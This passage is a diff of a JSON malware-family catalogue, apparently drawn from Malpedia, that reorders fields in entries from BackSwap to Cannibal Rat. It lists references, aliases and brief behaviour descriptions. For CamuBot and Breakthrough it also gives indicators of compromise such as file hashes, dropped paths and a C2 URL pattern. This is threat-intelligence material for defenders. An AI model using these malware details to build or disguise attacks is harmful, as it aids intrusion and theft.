+ "value": "BackSwap"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript",
 "https://twitter.com/PhysicalDrive0/status/833067081981710336"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "af1c99be-e55a-473e-abed-726191e1da05",
- "value": "BadEncript",
- "description": ""
+ "value": "BadEncript"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick",
 "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763",
- "value": "badflick",
- "description": ""
+ "value": "badflick"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews",
 "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
@@ -3586,192 +3588,190 @@
 "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2",
 "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1",
- "value": "BadNews",
- "description": ""
+ "value": "BadNews"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508",
- "value": "Bagle",
- "description": ""
+ "value": "Bagle"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut",
 "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
 "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
- "value": "Bahamut",
- "description": ""
+ "value": "Bahamut"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix",
 "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "721fe429-f240-4fd6-a5c9-187195624b51",
- "value": "Banatrix",
- "description": ""
+ "value": "Banatrix"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat",
 "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7",
- "value": "bangat",
- "description": ""
+ "value": "bangat"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "MultiBanker 2",
- "BankPatch",
- "BackPatcher"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori",
 "http://blog.kleissner.org/?p=69",
 "http://osint.bambenekconsulting.com/feeds/",
 "http://blog.kleissner.org/?p=192",
 "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/"
- ]
+ ],
+ "synonyms": [
+ "MultiBanker 2",
+ "BankPatch",
+ "BackPatcher"
+ ],
+ "type": []
 },
 "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324",
- "value": "Banjori",
- "description": ""
+ "value": "Banjori"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot",
 "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
 "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
- "value": "Bankshot",
- "description": ""
+ "value": "Bankshot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123",
- "value": "Bart",
- "description": ""
+ "value": "Bart"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper",
 "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5",
- "value": "BatchWiper",
- "description": ""
+ "value": "BatchWiper"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e",
- "value": "Batel",
- "description": ""
+ "value": "Batel"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat",
 "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a",
- "value": "BBSRAT",
- "description": ""
+ "value": "BBSRAT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b",
- "value": "Bedep",
- "description": ""
+ "value": "Bedep"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor",
 "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90",
- "value": "beendoor",
- "description": ""
+ "value": "beendoor"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos",
 "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e59d1d3a-6c23-4684-8be1-2f182f63ab41",
- "value": "BernhardPOS",
- "description": ""
+ "value": "BernhardPOS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Neurevt"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
 "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
@@ -3781,546 +3781,548 @@
 "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/",
 "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
 "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html"
- ]
+ ],
+ "synonyms": [
+ "Neurevt"
+ ],
+ "type": []
 },
 "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c",
- "value": "BetaBot",
- "description": ""
+ "value": "BetaBot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899",
- "value": "BfBot",
- "description": ""
+ "value": "BfBot"
 },
 {
+ "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates",
 "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
 "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf",
 "https://habrahabr.ru/post/213973/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6",
- "value": "BillGates",
- "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources."
+ "value": "BillGates"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "zxdosml"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit",
 "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
+ ],
+ "synonyms": [
+ "zxdosml"
+ ],
+ "type": []
 },
 "uuid": "f98b4092-5f32-407c-9015-2da787d70c64",
- "value": "Biscuit",
- "description": ""
+ "value": "Biscuit"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran",
 "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc",
- "value": "Bitsran",
- "description": ""
+ "value": "Bitsran"
 },
 {
+ "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.",
 "meta": {
- "synonyms": [
- "bwin3_bka"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner",
 "https://www.evild3ad.com/405/bka-trojaner-ransomware/"
- ]
+ ],
+ "synonyms": [
+ "bwin3_bka"
+ ],
+ "type": []
 },
 "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a",
- "value": "BKA Trojaner",
- "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language."
+ "value": "BKA Trojaner"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
 "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/",
 "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
 "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "82c644ab-550a-4a83-9b35-d545f4719069",
- "value": "BlackEnergy",
- "description": ""
+ "value": "BlackEnergy"
 },
 {
+ "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ",
 "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
+ ],
 "synonyms": [
 "POSWDS",
 "Reedum",
 "Kaptoxa"
 ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/"
- ]
+ "type": []
 },
 "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c",
- "value": "BlackPOS",
- "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. "
+ "value": "BlackPOS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution",
 "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8",
- "value": "BlackRevolution",
- "description": ""
+ "value": "BlackRevolution"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades",
 "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
 "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/",
 "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
 "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b",
- "value": "BlackShades",
- "description": ""
+ "value": "BlackShades"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe",
 "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f",
- "value": "Boaxxe",
- "description": ""
+ "value": "Boaxxe"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b",
- "value": "Bohmini",
- "description": ""
+ "value": "Bohmini"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "KBOT"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek",
 "https://asert.arbornetworks.com/communications-bolek-trojan/",
 "http://www.cert.pl/news/11379"
- ]
+ ],
+ "synonyms": [
+ "KBOT"
+ ],
+ "type": []
 },
 "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18",
- "value": "Bolek",
- "description": ""
+ "value": "Bolek"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer",
 "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699",
- "value": "Bouncer",
- "description": ""
+ "value": "Bouncer"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok",
 "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d",
- "value": "Bozok",
- "description": ""
+ "value": "Bozok"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul",
 "https://www.us-cert.gov/ncas/alerts/TA18-149A",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
 "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763",
- "value": "Brambul",
- "description": ""
+ "value": "Brambul"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc",
 "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "fbed27da-551d-4793-ba7e-128256326909",
- "value": "BravoNC",
- "description": ""
+ "value": "BravoNC"
 },
 {
+ "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader",
 "https://malpedia.caad.fkie.fraunhofer.de"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd",
- "value": "Breakthrough",
- "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n"
+ "value": "Breakthrough"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab",
 "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html",
 "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90",
- "value": "Bredolab",
- "description": ""
+ "value": "Bredolab"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos",
 "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151",
- "value": "BrutPOS",
- "description": ""
+ "value": "BrutPOS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
 "https://github.com/nccgroup/Royal_APT"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f",
- "value": "BS2005",
- "description": ""
+ "value": "BS2005"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware",
 "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8",
- "value": "BTCWare",
- "description": ""
+ "value": "BTCWare"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "16794655-c0e2-4510-9169-f862df104045",
- "value": "Bugat",
- "description": ""
+ "value": "Bugat"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Ratopak"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap",
 "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/",
 "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack",
 "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
 "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/"
- ]
+ ],
+ "synonyms": [
+ "Ratopak"
+ ],
+ "type": []
 },
 "uuid": "fa278536-8293-4717-86b5-8a03aa11063f",
- "value": "Buhtrap",
- "description": ""
+ "value": "Buhtrap"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "R2D2",
- "0zapftis"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner",
 "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf",
 "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html",
 "https://www.f-secure.com/weblog/archives/00002249.html"
- ]
+ ],
+ "synonyms": [
+ "R2D2",
+ "0zapftis"
+ ],
+ "type": []
 },
 "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47",
- "value": "Bundestrojaner",
- "description": ""
+ "value": "Bundestrojaner"
 },
 {
+ "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu",
 "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
 "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/",
 "http://malware-traffic-analysis.net/2017/05/09/index.html",
 "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d",
- "value": "Bunitu",
- "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72)."
+ "value": "Bunitu"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "spyvoltar"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat",
 "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html"
- ]
+ ],
+ "synonyms": [
+ "spyvoltar"
+ ],
+ "type": []
 },
 "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311",
- "value": "Buterat",
- "description": ""
+ "value": "Buterat"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93",
- "value": "Buzus",
- "description": ""
+ "value": "Buzus"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby",
 "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1",
- "value": 
"BYEBY", - "description": "" + "value": "BYEBY" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", - "value": "c0d0so0", - "description": "" + "value": "c0d0so0" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", - "value": "CabArt", - "description": "" + "value": "CabArt" }, { + "description": "", "meta": { - "synonyms": [ - "Cadelle" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] + ], + "synonyms": [ + "Cadelle" + ], + "type": [] }, "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", - "value": "CadelSpy", - "description": "" + "value": "CadelSpy" }, { + "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { - "synonyms": [], - "type": [], "refs": 
[ "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", - "value": "CamuBot", - "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." + "value": "CamuBot" }, { + "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", - "value": "Cannibal Rat", - "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. 
